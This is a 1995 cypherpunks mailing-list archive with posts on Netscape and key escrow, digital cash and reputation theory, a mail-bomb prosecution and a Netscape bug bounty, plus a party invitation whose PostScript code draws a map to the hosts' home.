which are prevalent in the market.  This kind of analysis would lead you
to focus on the importance of the amount of trust needed in a transaction.
The underlying utility function is based on such traditional factors as
productivity and reliability.  It won't change as we consider the
variables of our analysis, because we have factored out the honesty and
trust issues so that they are more explicit.  That's the kind of
direction I was suggesting.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 5 Dec 95 11:10:52 PST
To: cypherpunks@toad.com
Subject: No More Netscape Comments from Me
Message-ID: <ace9d98204021004b670@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



Not that you all hang on my every word, but I owe it to you folks at least
a brief mention of why I feel I can no longer comment on Netscape. Not for
legal reasons, but for conflict-of-interest reasons.

I'm in the midst of making some investments involving Netscape
(buying/selling short, Internet Index options, etc.) and my comments from
herein out could be thought of by some as disingenous.

So, have fun riding the Great Internet Bubble of 1995!

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Messick <eric@syzygy.com>
Date: Tue, 5 Dec 95 12:28:22 PST
To: cypherpunks@toad.com
Subject: ANNOUNCE: December 9th: Bay Area Cypherpunks Meeting and Party
Message-ID: <199512052032.MAA02154@syzygy.com>
MIME-Version: 1.0
Content-Type: text/plain


Bay Area Cypherpunks Meeting and Party

Saturday December 9th, 1995

What: Cypherpunks Meeting and Party
When: Saturday December 9th, 4pm - ???
Who:  You.
Where: Our dome in the Santa Cruz Mountains

We'll be providing some drinks and snacks.  Please feel free to bring
other consumables.

Directions follow.  Cut at the perferations and send to a PostScript
printer to generate a map.  Or, you can read the top of the file
directly.  This announcement is available on the Web at

<a href="http://syzygy.com/dec.cypherpunks.party.announcement.html">

this URL,</a> including a .gif version of the map and directions.

- ->8 - - - ->8 - - - ->8 - - - ->8 - - - ->8 - - - ->8 - - - ->8 - -
%!ps
%			Directions to KT & Eric's dome
%
%			KT & Eric
%			15139 Old Ranch Rd
%			Los Gatos CA 95030 8506
%			+1 408 353 4751
%
% From San Jose, take Highway 17 South from Highway 280 for 15 miles.
% From Santa Cruz, take Highway 17 North from Highway 1 for 12.5 miles.
% Exit Highway 17 at Summit Road (the only bridge over Highway 17 in
%    the mountains), and head west.
% 0.5 miles west of 17, turn left from Summit Road onto Hutchinson Road.
% 0.2 miles from Summit, just after Riva Ridge Road on the left and a long
%    group of mailboxes on the right, turn right from Hutchinson onto
%    Old Ranch Road.
% A short distance down Old Ranch there is a three-way fork.  The left
%    branch is a small driveway; the center branch is Old Ranch Road which
%    continues around a curve to the left (a sign points to the left to
%    indicate this); and the right branch leads to our house and three
%    others.  Our address (15139) is on the top of a sign to the right.
%    Turn onto the rightmost fork, down a steep grade.
% Our geodesic dome is 0.4 miles from Hutchinson Road down the rightmost
%    fork of Old Ranch Road.

/fg { 0 setgray } def
/bg { 1 setgray } def

/r { moveto currentpoint } def
/a { rmoveto pop pop currentpoint } def
/ah { pop pop currentpoint } def

/rc { rcurveto } def

/lab { % x y alpha (str)
	gsave
		4 2 roll rmoveto
		exch rotate
		show
	grestore
} def

/nl { show 7 sub r } def

bg clippath fill

4.25 72 mul 5.5 72 mul translate
90 rotate
2 2 scale
/Helvetica findfont 5 scalefont setfont

0 0 moveto
currentpoint

70 -100 a

	currentpoint				% North arrow
	50 30 a
	fg 3 setlinewidth
	0 60 rlineto ah stroke r
	0 -10 1 -15 5 -20 rc stroke r
	gsave
		-5 5 rmoveto
		/Times-Bold findfont 13 scalefont setfont
		(N) show
	grestore
	pop pop r

-12 20 -90 (to Santa Cruz -->) lab
-25 210 -65 (<-- to San Jose) lab

11 setlinewidth fg 2 120 -10 170 -30 200 rc stroke r	% 17 outer lines
7 setlinewidth bg 2 120 -10 170 -30 200 rc stroke r	% 17 interior
1 setlinewidth fg 2 120 -10 170 -30 200 rc stroke r	% 17 center

1.25 100 a

10 -40 270 (Highway 17) lab

2 setlinewidth

-2.5 27 rmoveto
fg 2 -7 5 -9 14.5 4.7 rc stroke r		% summit to 17n

-8.2 0 rmoveto
fg -2.5 20 -10.5 30 -20.5 50 rc stroke r	% summit to 17s

-12.75 35 rmoveto
fg 2 -15 -4 -8 -13.3 10 rc stroke r	% 17s to summit

1 setlinewidth

-3.2 49 rmoveto			% bridge fingers
fg 5 5 rlineto stroke r
-3.2 49 rmoveto
fg .85 -7 rlineto stroke r
-18.5 52 rmoveto
fg -3 6 rlineto stroke r
-19 52 rmoveto
fg -2 -6 rlineto stroke r

-1 48 rmoveto			% bridge border
9 setlinewidth
fg -8 3 -13 5 -20 4 rc stroke r
-1 48 rmoveto			% bridge interior
7 setlinewidth
bg -8 3 -13 5 -20 4 rc stroke r

2 setlinewidth

.5 0 rmoveto
fg 0 20 9.5 30 19.5 40 rc ah stroke r		% 17n to summit

	currentpoint
	fg 10 10 25 15 40 10 rc stroke r	% summit e
	33 15 -15 (Summit Rd) lab

	25 11.5 rmoveto
	fg 10 10 10 20 5 40 rc stroke r	% mt charlie e
	30 70 -80 (Mt Charlie Rd) lab

	5 15 25 (Phone) lab
	0 5 25 (Parking lot) lab
	pop pop r

fg -20 10 -40 15 -48 10 rc ah stroke r		% across bridge
fg -16 -10 10 -35 -3 -43 rc ah stroke r
fg 5 -10 0 -20 5 -30 rc stroke r		% mt charlie w
5 -5 -80 (Mt Charlie Rd) lab
fg -13 -8 -20 20 -30 15 rc ah stroke r
fg -10 -5 -30 -20 -55 -20 rc ah stroke r
fg 5 -10 0 -20 5 -30 rc stroke r		% stagecoach
5 -5 280 (Stagecoach Rd) lab
fg -25 0 -10 -20 -15 -25 rc ah stroke r
fg -5 -5 -30 0 -40 0 rc stroke r		% summit continues...
-45 5 -5 (Summit Rd) lab
fg 5 -5 0 -20 0 -30 rc ah stroke r		% hutchinson
5 25 -90 (Hutchinson Rd) lab
% side road could go here
fg 0 -10 3 -10 5 -17 rc ah stroke r
fg 5 -5 10 -8 20 -8 rc stroke r		% riva ridge
15 -5 0 (Riva Ridge Rd) lab
fg 1 -3 1 -4 2 -7 rc ah stroke r
fg 1 -3 5 -5 10 -7 rc stroke r		% hutchinson continues...
3 -12 -20 (Hutchinson Rd) lab
1.5 setlinewidth
fg -5 -5 -10 8 -15 3 rc ah stroke r	% old ranch
fg -3 -3 0 -10 5 -15 rc stroke r	% old ranch continues...
-8 -9 -55 (Old Ranch Rd) lab
1 setlinewidth
fg 2 1 rmoveto
-1 -2 1 -4 5 -7 rc stroke r		% left fork driveway
fg -5 5 -15 15 -20 12 rc ah stroke r	% our portion of old ranch
fg -5 -3 -15 -15 -25 -10 rc ah stroke r
fg -10 5 -15 5 -20 0 rc ah stroke r
fg -5 -5 -10 -5 -20 0 rc stroke r	% our portion continues...
fg 5 -5 rlineto ah stroke r		% our driveway

fg 7 2 rmoveto currentpoint newpath
3 0 360 arc stroke r

/Helvetica-Bold findfont 5 scalefont setfont
-15 -10 0 (KT & Eric) lab
-15 -15 0 (15139 Old Ranch Rd) lab
-15 -20 0 (Los Gatos CA 95030 8506) lab
-15 -25 0 (+1 408 353 4751) lab

-155 115 moveto ah
/Times-Roman findfont 6 scalefont setfont

(From San Jose, take Highway 17 South from Highway 280 for 15 miles.) nl
(From Santa Cruz, take Highway 17 North from Highway 1 for 12.5 miles.) nl
(Exit Highway 17 at Summit Road \(the only bridge over Highway 17 in) nl
(   the mountains\), and head west.) nl
(0.5 miles west of 17, turn left from Summit Road onto Hutchinson Road.) nl
(0.2 miles from Summit, just after Riva Ridge Road on the left and a long group) nl
(   of mailboxes on the right, turn right from Hutchinson onto Old Ranch Road.) nl
(A short distance down Old Ranch there is a three-way fork.  The left branch is a) nl
(   small driveway; the center branch is Old Ranch Road which continues around a) nl
(   curve to the left \(a sign points to the left to indicate this\); and the right branch) nl
(   leads to our house and three others.  Our address \(15139\) is on the top of a) nl
(   sign to the right.  Turn onto the rightmost fork, down a steep grade.) nl
(Our geodesic dome is 0.4 miles from Hutchinson Road down the rightmost) nl
(   fork of Old Ranch Road.) nl

-80 128 moveto ah
/Times-Bold findfont 12 scalefont setfont

(Directions to KT & Eric's dome) nl

pop pop
showpage




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Turner <dave.turner@wmc.ac.uk>
Date: Tue, 5 Dec 95 04:58:42 PST
To: cypherpunks@toad.com
Subject: Joining The Mailing List
Message-ID: <"mailhub.live:260730:951205123724"@liverpool.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


Cypherpunks,
Would it be possible to include me on your current mailin list.

Thanks
  Dave.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Tue, 5 Dec 95 12:55:39 PST
To: Duncan Frissell <frissell@panix.com>
Subject: Re: another fbi prosecution
In-Reply-To: <2.2b8.32.19951205200735.0067bb30@panix.com>
Message-ID: <Pine.ULT.3.91.951205125436.27077A-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 5 Dec 1995, Duncan Frissell wrote:

> At 07:30 AM 12/5/95 -0500, you wrote:
> 
> > sophomore Dominick LaScala was charged last week in federal court with two 
> > counts of computer fraud.
> 
> I thought fraud was obtaining something of value by false pretenses or
> uttering a false document or something.  Doesn't sound like fraud to me.

I think they're referring to at least one of the accounts being obtained
under false pretenses, and the From: lines (and probably Message-ID,
Received, etc) being forged. 

Which would still be an interesting precedent, yes.

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce <wilcoxb@taussky.cs.colorado.edu>
Date: Tue, 5 Dec 95 12:00:01 PST
To: cypherpunks@toad.com
Subject: The Newspaper sez J.Clark sez "Uncle Sam Needed for Net Security"
Message-ID: <199512052001.NAA20742@taussky.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

<begin quote>
   
   daily news
   
   Uncle Sam Needed for Net Security
   
   picture
   
   By Anne Knowles
          November 29, 1995, 12 p.m. PT
          
          BOSTON--Getting the government involved in maintaining
Internet data privacy may not be popular, but it's going to be
necessary. That's the message Netscape Communications chair Jim
Clark delivered this morning in his keynote address to an audience
here at Email World and Internet Expo.
          
          To secure Net communications, the government will need to
have access to private data exchanges using what is known as a key
escrow security system, said Clark. He added that an invincible
security system for the Net is possible, but such a system
won't be built unless the government has a stake in it. "That's
where key escrow comes in," said Clark.
          
          Key escrow is a controversial security system advocated by
the Clinton administration that gives the government access to
private Net communications. It uses public key cryptography, a
system in which messages are coded and decoded using a set of
private and public keys. In key escrow, the private key is held
by both the individual or group and the government. The
government can use the key ostensibly to read messages for
intelligence and national security reasons.
          
          Currently the U.S. government restricts export of strong
keys in excess of 40 bits so it can break the code if necessary. The
weaker keys, however, make the messages vulnerable to other
attacks as well. A group of French scientists, for example,
cracked Netscape software using 40-bit keys by employing a
network of supercomputers over the course of a week. According
to Clark, though, restricting the export of stronger software
isn't the answer. "That's the wrong solution; we need
bulletproof keys."
          
          Netscape's stock price soared $20 yesterday based on a buy
recommendation by Goldman Sachs. The stock continues to climb
today: the share price is up $9 to $140. Clark said Netscape is
trying to keep pace with everyone's expectations. "The Internet
is a gargantuan opportunity, but it's up to us to take advantage of
it."
          
          Expect to see more fluctuations. Said Steve Weiss, a
principal at Product Management Group in San Francisco, "Anything like
this that is so closely allied to wishes, bets, and beliefs is likely
to move up and down quite a bit." The run up is a reflection of the
promise the Internet holds for investors.  After all, added Weiss,
"the stock market is the mirror of the soul of the Internet."

          [Additonal reporting by Denise Shelton.]

<end quote>


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.01

iQCVAwUBMMSk8PWZSllhfG25AQESyQP8DBxGvO9Gkbwya6MmAVPRpGH2kqhQ3As5
5+2WoUKRpAfRg/0riHqIRK1vB9NW6mIM8Tl1I1FH1E7cagamKAb3yqjIQ56UApQG
9ow2ULaT7bRUHkhQuSF2jOpsJvzJdXSJGtvUyxB+BM0roAQHjFeWSVoUYv2GgVgU
7AsJwlLYorQ=
=/+dp
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathan Zamick <JonathanZ@consensus.com>
Date: Tue, 5 Dec 95 12:56:20 PST
To: Eric Messick <eric@syzygy.com>
Subject: Re: ANNOUNCE: December 9th: Bay Area Cypherpunks Meeting and Party
Message-ID: <v02120d05acea6467134b@[157.22.240.13]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:32 PM 12/5/95, Eric Messick wrote:
>Bay Area Cypherpunks Meeting and Party
>
>Saturday December 9th, 1995
>
>What: Cypherpunks Meeting and Party
>When: Saturday December 9th, 4pm - ???
>Who:  You.
>Where: Our dome in the Santa Cruz Mountains
>
>We'll be providing some drinks and snacks.  Please feel free to bring
>other consumables.

Heh. I'm still sorry I'll be missing this. I'm sadly going to be up in
Chicago that weekend getting ready for an internet security conference.

Since, I'm CC:ing this to the list, is anyone else going to be at 'Securing
Electronic Commerce on the Internet?' Thought it might be interesting to
dive out for dinner some evening with a few other Cpunk.

Jonathan

------------------------------------------------------------------------
..Jonathan Zamick                    Consensus Development Corporation..
..<JonathanZ@consensus.com>                      1563 Solano Ave, #355..
..                                             Berkeley, CA 94707-2116..
..                                        o510/559-1500  f510/559-1505..
..Mosaic/WWW Home Page:                                               ..
..  Consensus Home Page       ..






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@mbcl.rutgers.edu>
Date: Tue, 5 Dec 95 10:39:56 PST
To: pfarrell@netcom.com
Subject: Re: Meeting notes from ANSI X.9 Meeting on Electronic Payment
Message-ID: <01HYG7SGZ8ZO9S3QKQ@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"pfarrell@netcom.com"  5-DEC-1995 02:49:01.83

Accountants know how to meet acceptable auditing standards when
transactions are in cash. I learned this from the CPA I live
with.
-----------------
	How does this work? While I can see tracking expenditures (i.e.,
the advertized price of an item and the amount of that item purchased by a
store), it would appear decidedly more difficult in the case of service
companies (and even more so for self-employed individuals). I am not referring
to a company being able to keep track of its own books; I am referring to the
IRS accepting those books as the real ones, when a large part of the company's
income is in cash and therefore hard to trace.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jon Lasser <jlasser@rwd.goucher.edu>
Date: Tue, 5 Dec 95 10:43:10 PST
To: cypherpunks <cypherpunks@toad.com>
Subject: [NOISE] [POINTER]
Message-ID: <Pine.SUN.3.91.951205133522.20012A-100000@rwd.goucher.edu>
MIME-Version: 1.0
Content-Type: text/plain


(All my messages will now be tagged as noise, because someone, somewhere, 
might disagree :)  )

http://www.salon1999.com/current/features/media.html

About censorship and fear in the media.  No crypto mentions, but Exon, 
V-Chip, Internet, etc... for the average reader, really.  But interesting 
nonetheless...

Jon
------------------------------------------------------------------------------
Jon Lasser                <jlasser@rwd.goucher.edu>            (410)494-3072 
          Visit my home page at http://www.goucher.edu/~jlasser/
  You have a friend at the NSA: Big Brother is watching. Finger for PGP key.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@mbcl.rutgers.edu>
Date: Tue, 5 Dec 95 10:47:09 PST
To: nsb+limbo@nsb.fv.com
Subject: Re: Geodesic Payment Systems?  (was Re: Meeting notes from ANSI X.9Meeting on Electronic Payment)
Message-ID: <01HYG84E8ZRU9S3QKQ@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"nsb+limbo@nsb.fv.com"  "Nathaniel Borenstein"  5-DEC-1995 09:37:47.34

A true geodesic structure is self-supporting and self-structuring.  A
cryptographic infrastructure can and should be similar, I agree
completely.  However, a *monetary* infrastructure needs convertability,
and the points of conversion are always the best targets of attack for
criminals.  (I've been casting about for an analogy to physical
geodesics, and it's hard to find one.  The best I can come up with is to
imagine that in order to convert a carbon buckyball to a more
conventional set of carbon molecules, you had to do it through a service
bureau that was capable of error, fraud, or subversion by outside
criminals.  This would ONLY matter if you ever wanted to do such
conversions, but it would matter a lot then, especially if you had to
suffer a serious financial loss if you got the wrong carbon molecules at
the end of the process.)

IF you wanted to settle for a totally non-convertible economy (like
rubles in the old Soviet Union, or like the LETS system on the net
today, as I understand it) then you could build it geodesically.  But if
you want to be able to convert back and forth between Internet payment
systems and non-Internet payment systems, it can never be truly
geodesic.  It will always be attackable at the points of conversion. 
(You may "trade digital certificates", but how do you know the ones
you're receiving were obtained for legitimate real-world value?) 
Because of this, the underwriting financial institutions, who have a
very reasonable desire to limit their own risk, will inevitably seek the
protection-by-traceability offered by something less than perfect
anonymity.  We may not like it, but it's a very natural position to be
taken by those who are actually bearing the financial risks at the point
----------------------------
	All of this is assuming that the digital currency being produced has
a one-to-one ratio with some "real" currency. If, for instance, the digital
certificates were indeed bought with a one-to-one ratio from the producer, but
were traded to others for "real" cash at some market-determined discount, the
market would incorporate the risk. The traders who were willing to take the
risk that the certificates were not actually worth one dollar/whatever would
be able to make a profit by the difference between one digital dollar and one
"real" dollar. The problem is simplified even more with privately backed
currencies.
	-Allen 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Tue, 5 Dec 95 12:06:12 PST
To: cypherpunks@toad.com
Subject: Re: another fbi prosecution
Message-ID: <2.2b8.32.19951205200735.0067bb30@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:30 AM 12/5/95 -0500, you wrote:

> sophomore Dominick LaScala was charged last week in federal court with two 
> counts of computer fraud.

I thought fraud was obtaining something of value by false pretenses or
uttering a false document or something.  Doesn't sound like fraud to me.

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Tue, 5 Dec 95 15:25:30 PST
To: cypherpunks@toad.com
Subject: Re: The Newspaper sez J.Clark sez "Uncle Sam Needed for Net Security"
Message-ID: <199512052326.PAA18556@ix4.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:47 PM 12/5/95 MET, Andreas Bogk <andreas@artcom.de> wrote:
>    Bryce>           To secure Net communications, the government will
>    Bryce> need to have access to private data exchanges using what is
>    Bryce> known as a key escrow security system, said Clark. He added
>
>Who was the guy who asked why "we" are mad at netscape? Well, I am
>because of exactly this blatant lie.

If you examine the grammar carefully, it's not a blatant lie,
it's quite correct.  If the government is going to "secure" (either
using the definition of "obtain for oneself" or "tie down")
Net communications, it will need to use some obnoxiously interfering 
technique, and so-called key-escrow is one way to do it.

Alternatively, using the definition of "secure" as "protect",
it will need to have access to private communications only through
security systems such as _real_ escrow, in which some mutually trusted
third party holds some assets until both parties have fulfilled the
terms of the escrow contract.  If you don't have a mutually trusted
third party, or one party doesn't deliver an asset it's supposed to,
or the other party doesn't play fair, then the transaction fails;
making sure it succeeds or fails cleanly, and verifying the status 
of the transaction at any time, is the escrow agent's job.

Government Access to Keys (GAK) is something radically different;
the government agrees not to interfere with your communications if
you deliver your keys to some other part of the government.  
There's no trusted third party (unless you trust the government),
wiretap rules generally forbid verifying to the victim whether his
communications are tapped or not, and the deal with the non-independent
escrow agent allows the government to change the terms of the so-called
escrow at any time, unlike a real escrow agreement.  (In other words,
it's a lie, a total crock, and absolutely UnAmerican, and there isn't
even a House UnAmerican Activities Committee* to complain to :-)

[ * Translation for you non-Americans; the term "UnAmerican" means
"something the good honest people of this country disapprove of,
like Communism and Socialism and maybe Communism and even occasionally
Fascism in extreme cases and especially Communism (but certainly not
things like racism or militarism or corrupt lying politicians)"
The House UnAmerican Activities Committee was a committee of Congressmen
who went around investigating anybody they didn't like and suspected of
being Communist, or could accuse of being Communist if they didn't like them.
They were most active during the 1950s and 1960s, and are fortunately gone
by now.]
#--
#				Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281

# Anybody notice that Microsoft's Wide Open Road ad has barbed-wire fences
# on both sides of the road?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@nsa.tempo.att.com>
Date: Tue, 5 Dec 95 12:33:01 PST
To: cypherpunks@toad.com
Subject: latest librand source now available
Message-ID: <199512052034.PAA26869@nsa.tempo.att.com>
MIME-Version: 1.0
Content-Type: text/plain


Souce code for the latest version of librand (a random
number package based on event interval variations) for
Unix-like machines is now available in:
  ftp://ftp.research.att.com/dist/mab/librand.shar

There are no restictions on use or distribution of this
code, which was written by Matt Blaze, Jack Lacy, and
Don Mitchell.

-matt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Tue, 5 Dec 95 15:40:49 PST
To: cypherpunks@toad.com
Subject: Netscape Bug Bounty...
Message-ID: <199512052338.PAA06971@ammodump.mcom.com>
MIME-Version: 1.0
Content-Type: text/plain



  FYI, since both the bounty and the particular bug have been discussed
here...

  We are awarding Scott Weston $1000 for reporting the LiveScript history
problem.  The announcement should show up on our Bug Bounty winner's
page by tomorrow.

	--Jeff

Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@research.att.com>
Date: Tue, 5 Dec 95 12:51:51 PST
To: cypherpunks@toad.com
Subject: latest librand source now available
Message-ID: <199512052058.PAA27083@nsa.tempo.att.com>
MIME-Version: 1.0
Content-Type: text/plain


[Sorry if this is a duplicate; my machine had a bogus sendmail.cf
when I first sent this.]

Souce code for the latest version of librand (a random
number package based on event interval variations) for
Unix-like machines is now available in:
  ftp://ftp.research.att.com/dist/mab/librand.shar

There are no restictions on use or distribution of this
code, which was written by Matt Blaze, Jack Lacy, and
Don Mitchell.

-matt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wei Dai <weidai@eskimo.com>
Date: Tue, 5 Dec 95 17:00:39 PST
To: Nathaniel Borenstein <nsb+limbo@nsb.fv.com>
Subject: Re: Geodesic Payment Systems? (was Re: Meeting notes from ANSI X.9 Meeting on Electronic Payment)
In-Reply-To: <gkl58I2Mc50eBlRA1y@nsb.fv.com>
Message-ID: <Pine.SUN.3.91.951205154829.10701A-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 5 Dec 1995, Nathaniel Borenstein wrote:

> In terms of crypto-privacy, anonymous communication, and things like
> that, I agree completely.  However, it's genuinely more complicated than
> that where money is concerned, because there are aspects of the
> translation between "bits and bucks" that have some extremely serious
> practical complexities.
> 
> A true geodesic structure is self-supporting and self-structuring.  A
> cryptographic infrastructure can and should be similar, I agree
> completely.  However, a *monetary* infrastructure needs convertability,
> and the points of conversion are always the best targets of attack for
> criminals.  (I've been casting about for an analogy to physical
> geodesics, and it's hard to find one.  The best I can come up with is to
> imagine that in order to convert a carbon buckyball to a more
> conventional set of carbon molecules, you had to do it through a service
> bureau that was capable of error, fraud, or subversion by outside
> criminals.  This would ONLY matter if you ever wanted to do such
> conversions, but it would matter a lot then, especially if you had to
> suffer a serious financial loss if you got the wrong carbon molecules at
> the end of the process.)

I agree that conversion points are good targets for attack.  Therefore
whether conversion services are centralized or distributed will partly
depend on the economy of scale in protection against criminals.  I'm not
sure how much of this economy of scale exists for conversion between
electronic and physical monetary instruments.  But if we're converting
between one eletronic system and another, then cryptographic protocols
reduce the cost of protection to nearly zero for even small organizations. 

Wei Dai




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pcw@access.digex.net (Peter Wayner)
Date: Tue, 5 Dec 95 12:58:52 PST
To: "Bob Bruen, MIT Lab for Nuclear Science" <BRUEN@mitlns.mit.edu>
Subject: Re: another fbi prosecution
Message-ID: <v02130502acea65f513e9@[199.125.128.5]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:30 AM 12/5/95, Bob Bruen, MIT Lab for Nuclear Science wrote:

> Dominick had his campus account taken away after other users complained
> that he had been "advertising business proposals inappropriately on line."
> The FBI alleges that he then sent 24,000 email messages in one day from a
> commercial account (unamed) to Monmouth's system.. This denial of service
> attack was successful for about 5 hours. He is facing six(6) years in prison
> and a up to $350,000 in fines (1.20 years/hr and and $70,000/hr).
>
> His lawyer (Kenneth Weiner) claims that "even if his client sent the mail
> bomb" since no damage was done to the system, he could not be convicted
> under the computer fraud statute. He also claims that prosecutors are trying
> to make an example of his client. The university is still trying to figure
> out whether he can be punished under the university code of conduct.
>

If Monmouth college is like almost every other college I know,
they routinely send
out "mail bombs" to their alumni. That is, mass mailings sent through the postal
service. Given that we've agreed to legitimize this behavior in the paper world,
I can't see what's so wrong about doing it in the electronic world.

Of course, he could have been spreading false advertising which would really
be fraud.

-Peter






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: JR@ROCK.CNB.UAM.ES
Date: Tue, 5 Dec 95 06:04:19 PST
To: cypherpunks@toad.com
Subject: Re: Netscape gives in to key escrow
Message-ID: <951205161624.20a04076@ROCK.CNB.UAM.ES>
MIME-Version: 1.0
Content-Type: text/plain


SMTP%"unicorn@schloss.li"  4-DEC-1995 23:35:15.06 writes
>On Mon, 4 Dec 1995 JR@ns.cnb.uam.es wrote:
>
>> Black Unicorn <unicorn@polaris.mindport.net> wrote
>> >On Fri, 1 Dec 1995 JR@ns.cnb.uam.es wrote:

... many cuts all along to save bandwidth ...
>
>I'm afraid you have missed the point too.
>
>I don't care as much what the personal positions are, or what the ethical 
>center from which person x or person y works.
>
>I am most distressed because of what I see as a snowjob.
>
>"We are anti-GAK"
>
>Great, tell me what you have done to prevent GAK from proliferating.
>
>In the absence of an answer to that challenge, I have to question the 
>first statement as fluff or PR.
>
>This has nothing to do with Netscape sharing my opinion, or not sharing 
>my view on the evil of GAK.  It has to do with putting up or shutting 
>up.  I have been told that Netscape agrees with me, or will agree with 
>me, I just don't know that I believe it yet.

	For the last time: I have nothing to do with Netscape. So, please,
stop making silly associations. What I do to defend my opinions it to try
and get more people involved in the subject, explain the problems in terms
they can understand, discuss with them about possible solutions (sometimes
they have better ideas than me) and try to promote an effective course of
action. And in any case that's *my* business.

	Being in a different country and even continent, what I do may not
be of any direct consequence to you. And since I have nothing to do with
any commercial company -hey I don't even use Netscape- it has no relationship
whatsoever with Netscape or any other company.

	If you think that people likes to hear complains, go along. In my
experience people is more cooperative when they see better solutions than
just making a boicott and renouncing to use things they like. So, I'll 
keep on explaining what crypto can do for them and how easy it is to be
taken advantage of. And how easy it is for them to press and get what they
deserve.

	WRT legal courses of actions, just remember there's a whole world
our your privy. It's sad you don't know better, but if you look around
carefully you'll discover that many of the proposed actions are not feasible
in many places. Just go out of your shell.

	I haven't either. I wouldn't be here if I did.

				jr




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joe Tardo" <joe_tardo@genmagic.com>
Date: Tue, 5 Dec 95 16:27:56 PST
To: "CypherPunks Mailing List" <dl@hplyot.obspm.fr>
Subject: Re: French crypto restricti
Message-ID: <n1393941588.2713@qm.genmagic.com>
MIME-Version: 1.0
Content-Type: text/plain


        Reply to:   RE>>French crypto restrictions - update ?

Would this imply that Netscape supplied source code to SCSSI?

From: Laurent Demailly
> Yes Netscape got the authorisation to sell Netscape navigator in
> France (40 bits) but there is no policy changes or whatever, it is
> still a tedious product by product process to get auth for crypto and









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@universe.digex.net>
Date: Tue, 5 Dec 95 14:22:26 PST
To: Hal <hfinney@shell.portal.com>
Subject: Re: towards a theory of reputation
In-Reply-To: <199512052029.MAA08717@jobe.shell.portal.com>
Message-ID: <199512052222.RAA07434@universe.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


Hal writes:
>From: Scott Brickner <sjb@universe.digex.net>
>> Analytically, using an escrow agent doesn't change the utility
>> function.  It replaces the trading partner's honesty reputation
>> estimate with the escrow agent's (which is presumably higher, or why
>> use them?).  This is just a parameter substitution.
>> 
>> Whence comes the intractability?
>
>By the "utility function" I was referring to Wei's model in which each
>person has an idea of how much "utility" (a general summation of
>personal value and usefulness) they would get from another person, as a
>function of cost.  The utility function takes cost as input and returns
>"utiles" (or whatever) as output.  So, with this model, using an escrow
>agent would change the utility function; for a given cost, the utility
>of a person to me would change (say, if the person involved were
>thought to be dishonest, then the presence of escrow agents would make
>him more useful to me).  The utility function in Wei's model is a curve
>where the Y axis is utility and the X axis is cost.  Changing the
>importance of honesty will change the position and shape of this
>curve.
>
>I think it would be more tractable to have a model in which honesty
>played an explicit part.  We might even make assumptions about the
>mathematical relationship between honesty and overall utility - for
>example, that utility to me would be monotonically increasing with
>increased honesty of the other guy.

I had in mind that the utility function was being used by some agent to
determine its course of action.  Imagine the agent trying to determine
which of several services to use.  It may reasonably be expected to
evaluate the utility function for each one, and choose the one with the
highest utility.  "Reputation for honesty" is one parameter to the
function.  Price, turnaround, and reputation for quality are others.  A
smarter agent could consider "metaservices" which bundle the given
service with an escrow agent.  The net effect is to permit the agent to
replace the service's honesty with the escrow agent's for the
evaluation --- regardless of the internals of the model.

>What I mean is something like this.  Let t be the degree of trust
>necessary for a business relationship to be consummated.  For t=0, no
